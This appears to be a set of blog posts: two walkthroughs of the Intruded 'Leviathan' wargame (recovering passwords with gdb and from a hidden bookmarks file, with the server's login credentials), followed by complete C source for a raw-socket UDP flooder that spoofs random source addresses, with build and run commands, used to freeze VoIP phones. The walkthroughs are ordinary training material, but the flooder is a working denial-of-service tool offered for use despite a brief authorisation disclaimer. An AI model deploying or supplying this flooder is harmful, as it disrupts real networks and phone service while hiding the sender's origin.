
Intruded Nº4


For the 4th one, we remember that there was a program called
« level4 » in the /wargame folder, so let's go to it.

first run :

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

interesting .. it looks like the 2nd challenge; let's disassemble the main function:

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 <main+0>:	lea    0x4(%esp),%ecx
0x08048527 <main+4>:	and    $0xfffffff0,%esp
0x0804852a <main+7>:	pushl  0xfffffffc(%ecx)
0x0804852d <main+10>:	push   %ebp
0x0804852e <main+11>:	mov    %esp,%ebp
0x08048530 <main+13>:	push   %ecx
0x08048531 <main+14>:	sub    $0x44,%esp
0x08048534 <main+17>:	mov    0x8048757,%eax
0x08048539 <main+22>:	mov    %eax,0xfffffff1(%ebp)
0x0804853c <main+25>:	movzwl 0x804875b,%eax
0x08048543 <main+32>:	mov    %ax,0xfffffff5(%ebp)
0x08048547 <main+36>:	movzbl 0x804875d,%eax
0x0804854e <main+43>:	mov    %al,0xfffffff7(%ebp)
0x08048551 <main+46>:	mov    0x804875e,%eax
0x08048556 <main+51>:	mov    %eax,0xffffffe7(%ebp)
0x08048559 <main+54>:	mov    0x8048762,%eax
0x0804855e <main+59>:	mov    %eax,0xffffffeb(%ebp)
0x08048561 <main+62>:	movzwl 0x8048766,%eax
0x08048568 <main+69>:	mov    %ax,0xffffffef(%ebp)
0x0804856c <main+73>:	mov    0x8048768,%eax
0x08048571 <main+78>:	mov    %eax,0xffffffe0(%ebp)
0x08048574 <main+81>:	movzwl 0x804876c,%eax
0x0804857b <main+88>:	mov    %ax,0xffffffe4(%ebp)
0x0804857f <main+92>:	movzbl 0x804876e,%eax
0x08048586 <main+99>:	mov    %al,0xffffffe6(%ebp)
0x08048589 <main+102>:	mov    0x804876f,%eax
0x0804858e <main+107>:	mov    %eax,0xffffffd9(%ebp)
0x08048591 <main+110>:	movzwl 0x8048773,%eax
0x08048598 <main+117>:	mov    %ax,0xffffffdd(%ebp)
0x0804859c <main+121>:	movzbl 0x8048775,%eax
0x080485a3 <main+128>:	mov    %al,0xffffffdf(%ebp)
0x080485a6 <main+131>:	mov    0x8048776,%eax
0x080485ab <main+136>:	mov    %eax,0xffffffcf(%ebp)
0x080485ae <main+139>:	mov    0x804877a,%eax
0x080485b3 <main+144>:	mov    %eax,0xffffffd3(%ebp)
0x080485b6 <main+147>:	movzwl 0x804877e,%eax
0x080485bd <main+154>:	mov    %ax,0xffffffd7(%ebp)
0x080485c1 <main+158>:	lea    0xffffffd9(%ebp),%eax
0x080485c4 <main+161>:	mov    %eax,0x4(%esp)
0x080485c8 <main+165>:	lea    0xffffffe0(%ebp),%eax
0x080485cb <main+168>:	mov    %eax,(%esp)
0x080485ce <main+171>:	call   0x804835c <strcmp@plt>
0x080485d3 <main+176>:	test   %eax,%eax
0x080485d5 <main+178>:	jne    0x80485de <main+187>
0x080485d7 <main+180>:	movl   $0x1,0xfffffff8(%ebp)
0x080485de <main+187>:	movl   $0x8048742,(%esp)
0x080485e5 <main+194>:	call   0x80483bc
0x080485ea <main+199>:	call   0x8048484
0x080485ef <main+204>:	add    $0x44,%esp
0x080485f2 <main+207>:	pop    %ecx
0x080485f3 <main+208>:	pop    %ebp
0x080485f4 <main+209>:	lea    0xfffffffc(%ecx),%esp
0x080485f7 <main+212>:	ret
---Type <return> to continue, or q <return> to quit---q
Quit

Again, let's take the interesting part:

0x080485ce <main+171>:	call   0x804835c <strcmp@plt>
0x080485d3 <main+176>:	test   %eax,%eax
0x080485d5 <main+178>:	jne    0x80485de <main+187>

let's set a breakpoint on the strcmp call and run the program until it asks for the password:

(gdb) break *0x804835c
Breakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ One interesting thing: I had to press « s » three times to get back into main after the breakpoint.
That is expected: the breakpoint sits on the PLT stub (strcmp@plt), so the first step leaves the stub,
the second steps out of libc's strcmp, and the third returns into main at 0x080485d3 — anyway, let's continue /!\

let's look at what is on the stack at $esp (the return address, then the arguments of strcmp):

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

Ok, we got our password back (the first argument of strcmp is our own input). Note the return address
0x080484e6 on top of the stack: this strcmp is called from the function at 0x8048484, not from main itself.
So, let's go a bit further:

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd: "snlprintf\n"
(gdb)

ok .. here is the little trick: "snlprintf" is the password we are looking for — the expected string was
chosen to look like a C function name. The clue is the trailing "\n": the program keeps the newline from our
input (we saw "test\n" above), so the stored string also ends in "\n" and typing snlprintf followed by Enter compares equal ;)

let's try the password :

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

yeah let's go to the next lvl ;)

Intruded nº1


Today I tried the Intruded Leviathan wargame (the first levels).

I will explain how to solve them easily.

Let’s try the first one.

  1. open a terminal
  2. type « ssh level1@leviathan.intruded.net -p 10101 »
  3. type the password « leviathan »

and then you should get something like this :

*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level1@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

Now that we are connected, let's start with a first command to look around:

ls -a lists the directory contents, including the hidden entries (those whose name starts with a dot)

level1@leviathan:~$ ls -a
.  ..  .backup  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd

Hmmm, there is a hidden « .backup » folder; let's enter it and list it.

level1@leviathan:~$ cd ./.backup
level1@leviathan:~/.backup$ ls -a
bookmarks.html

Ok, bookmarks. Let's see if there are some « passwords » in there:

level1@leviathan:~/.backup$ cat ./bookmarks.html |grep pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
level1@leviathan:~/.backup$

Easy … we got it: the bookmark line carries the level2 password (AFeSdWEf) right inside its HTML attributes.

let’s meet at the next level :)

UDP Flooder in C


Yesterday we were still working on some attacks on our test bench, and we tried some exploits against the phones
that we found on the Internet. Most of them DoS the phone, but they also block it: when people try to call … they
find the phone frozen. So, together with a friend, I made some modifications to a UDP flooder in C that I had lying
around from a few years ago.

It sends UDP datagrams to random ports of a specific address, with a random (spoofed) source address, and it only
works on Linux: it needs root for the raw socket, and it relies on the Linux kernel filling in the IP total-length
and checksum fields that the code itself leaves wrong or empty.
The code helps us cut the connection between the 2 phones: one tries to reach the other, but the other is too busy
answering all the « pings » — and sending the answers to random addresses that cannot reply.
Needless to say, point this only at equipment you own or are explicitly authorised to test: spoofed-source floods
against anything else are illegal, and many networks drop spoofed packets at the edge anyway (BCP 38).

We also discovered that when the connection between the 2 phones is established the phone
is not affected.

Here is the code.

/* Feature macros must come before the first include to have any effect.
 * _DEFAULT_SOURCE is the documented glibc switch for the BSD-style
 * struct ip / struct udphdr field names (uh_sport, ip_v, ...); the two
 * historical defines below are kept for older toolchains. */
#define __FAVOR_BSD
#define _USE_BSD
#define _DEFAULT_SOURCE

#include <stdio.h>  // printf/fprintf
#include <stdlib.h> // malloc/free, rand/srand, exit
#include <string.h> // memset/memcpy
#include <time.h>   // time()
#include <unistd.h> // usleep(), close()

#include <arpa/inet.h>   // inet_addr(), htons()
#include <netinet/in.h>  // struct sockaddr_in
#include <netinet/ip.h>  // struct ip
#include <netinet/udp.h> // struct udphdr
#include <sys/socket.h>  // socket(), setsockopt(), sendto()

#define PADDING_SIZE 1
#define N_LOOP 10
#define U_WAITING 100000 

void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);

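/*
 * Entry point: sends datagrams to the two hard-coded targets alternately,
 * N_LOOP times, sleeping U_WAITING microseconds after each send and
 * printing a "-" / "+" progress marker.
 *
 * "xxx.xxx.xxx.xxx" is a placeholder the user must replace before building;
 * left as is, inet_addr() returns INADDR_NONE (0xffffffff) for it and udp()
 * does not check that.  The program needs root / CAP_NET_RAW because udp()
 * opens a raw socket.
 *
 * Changes from the original: explicit `int main(void)` (implicit int is not
 * valid C99+), a return value, and a flush after each marker so the
 * progress indicator actually shows up on a line-buffered terminal.
 */
int main(void) {
    srand(time(NULL)); /* seeds rand() for hasard() */

    for (int i = 0; i < N_LOOP; i++) {
        udp("xxx.xxx.xxx.xxx");
        usleep(U_WAITING);
        printf("-");
        fflush(stdout); /* no newline is printed, so flush or nothing appears until exit */
        udp("xxx.xxx.xxx.xxx");
        usleep(U_WAITING);
        printf("+");
        fflush(stdout);
    }
    return 0;
}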

/*
 * Builds one raw IPv4/UDP datagram with a random (spoofed) source address and
 * random source/destination ports and sends it to the IPv4 address given in
 * `cible` (French for "target"; a dotted-quad string).  Each call opens and
 * closes its own raw socket, which requires root / CAP_NET_RAW.
 *
 * Review notes on what the code as written actually does (code left unchanged):
 *  - socket() failure is reported but not handled: sd stays -1 and it is the
 *    following setsockopt() that finally exit()s.
 *  - inet_addr() returns INADDR_NONE (0xffffffff) for an unparseable string
 *    such as the "xxx.xxx.xxx.xxx" placeholder in main(); nothing checks it.
 *  - malloc() is unchecked; `sin` is never zeroed (sin_zero left uninitialised).
 *  - ip_len is set to sizeof(pksize) == sizeof(int), not the packet length;
 *    ip_id is sizeof(45) == sizeof(int); ip_sum stays 0 (in_chksum() is never
 *    called).  This only "works" because the Linux raw(7) IP_HDRINCL path
 *    always fills in the total length and the IP checksum itself; another
 *    kernel would emit broken packets.  Correct would be ip_len = htons(pksize)
 *    plus ip_sum = in_chksum((unsigned short *) ip, sizeof(struct ip)).
 *  - The random ports are stored without htons(); since they are random anyway
 *    the byte order does not matter.
 *  - close() and inet_addr() need <unistd.h> / <arpa/inet.h>, which the
 *    original include list does not provide.
 */
void udp(char *cible) {

int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); /* raw IP socket: we supply the whole IP header ourselves */
if (sd == -1) {
fprintf(stderr,"socket() error, root ?\n"); /* NOTE(review): should return here; execution continues with sd == -1 */
}

/* spoofed source: a random address in the upper half of the IPv4 space
 * (128.0.0.0 - 255.255.255.255), which also includes multicast 224/4 and
 * reserved 240/4; egress filtering upstream may drop such packets */
unsigned long ip_src = hasard(4294967295/2,4294967295);
unsigned long ip_dst = inet_addr(cible); /* NOTE(review): INADDR_NONE on parse failure is not checked */
unsigned short p_src = (unsigned short) hasard(0,65535); /* random ports, host byte order (no htons) */
unsigned short p_dst = (unsigned short) hasard(0,65535);

struct sockaddr_in sin; /* NOTE(review): not zeroed; only family/port/addr are set */

sin.sin_family = AF_INET;
sin.sin_port = p_dst; /* presumably ignored for a raw socket (the kernel routes on the header) — verify against raw(7) */
sin.sin_addr.s_addr = ip_dst; // dst

struct ip *ip;
struct udphdr *udp;
char *dgm, *data;

/* IP header + UDP header + PADDING_SIZE bytes of payload, laid out back to back */
int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
dgm = (char *) malloc(pksize); /* NOTE(review): unchecked allocation */
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));

memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE); /* one-byte payload */

/* IP_HDRINCL: tell the kernel the buffer already starts with an IP header */
int un = 1;
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
 {
 fprintf(stderr,"setsockopt()");
 exit(-1); /* also where a failed socket() above ends up */
 }

// IP header

ip->ip_v = 4;
ip->ip_hl = 5; /* 5 * 4 = 20 bytes, no options */
ip->ip_tos = 0;
ip->ip_len = sizeof(pksize); /* BUG: sizeof(int), not the packet length; should be htons(pksize). Linux overwrites it. */
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = sizeof( 45 ); /* sizeof(int) == 4 on every packet; a zero here would let Linux assign one */
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0; // to be filled in later — never is; Linux computes it for IP_HDRINCL sends
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;

// UDP header

udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
udp->uh_sum = 0; /* 0 means "no checksum" for UDP over IPv4 (RFC 768), so this is legal */

// send
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
 sizeof(struct sockaddr)) == -1) {
 fprintf(stderr,"oops, sendto() error\n"); /* logged only; the loop in main() carries on */
 }

// free memory
free(dgm);
close(sd);
}

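/*
 * Internet checksum (RFC 1071) over `len` bytes starting at `addr`: the ones'
 * complement of the ones'-complement sum of the buffer taken as 16-bit words,
 * in the same byte order the words were read in (so a packet in network order
 * yields a network-order checksum).  An odd trailing byte is padded with a
 * zero byte.  Adapted from papasmurf.c.
 *
 * The original folded the carry with `sum + 0xffff` instead of `sum & 0xffff`,
 * which produces wrong checksums; it went unnoticed because udp() never calls
 * this (it relies on the kernel filling in ip_sum).  The accumulator is
 * unsigned long so a 64 KiB buffer cannot overflow a signed int.
 *
 * addr: start of the buffer (16-bit aligned).
 * len:  length in bytes.
 * Returns the 16-bit checksum; 0xffff for an all-zero buffer, 0 for a buffer
 * that already includes a correct checksum.
 */
unsigned short in_chksum(unsigned short *addr, int len)
{
    unsigned long sum = 0;
    unsigned short *w = addr;
    int remaining = len;

    /* add up all the full 16-bit words */
    while (remaining > 1) {
        sum += *w++;
        remaining -= 2;
    }

    /* odd length: treat the last byte as the first byte in memory of a
     * zero-padded word, matching how the full words were read */
    if (remaining == 1) {
        unsigned short last = 0;
        *(unsigned char *) &last = *(unsigned char *) w;
        sum += last;
    }

    sum = (sum >> 16) + (sum & 0xffff); /* fold the carries into 16 bits */
    sum += (sum >> 16);                  /* add the carry the fold may produce */
    return (unsigned short) ~sum;
}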

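/*
 * Returns a pseudo-random integer in the closed range [min, max]
 * ("hasard" is French for "chance").
 *
 * Uses rand(), so the caller must seed with srand() first (main() does).
 * The original scaled by (float) rand() / RAND_MAX, which (a) yields
 * exactly max + 1 when rand() returns RAND_MAX and (b) computed
 * max - min + 1 in unsigned long, which wraps to 0 for the full 32-bit
 * range on 32-bit systems.  Dividing by RAND_MAX + 1.0 keeps the scaled
 * value strictly below max - min + 1, and doing the width arithmetic in
 * double avoids the wrap.  If max <= min, min is returned.
 *
 * rand() is not a cryptographic generator: fine for picking ports and
 * addresses here, never for anything that must be unpredictable.
 */
unsigned long hasard(unsigned long min, unsigned long max) {
    if (max <= min) {
        return min;
    }
    double width = (double) max - (double) min + 1.0;
    double scaled = rand() / (RAND_MAX + 1.0) * width; /* in [0, width) */
    return min + (unsigned long) scaled;
}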

This works quite well to disturb people without damaging the phone.
You can easily compile it with the following command:

gcc -o udp udp.c

and run it (as root, because it opens a raw socket) with

./udp

if everything is working you should see

+-+-+-

this is appearing during the running time.

We tested it on Cisco 7940 phones and it worked well … soon we will publish some new code.

Have fun.
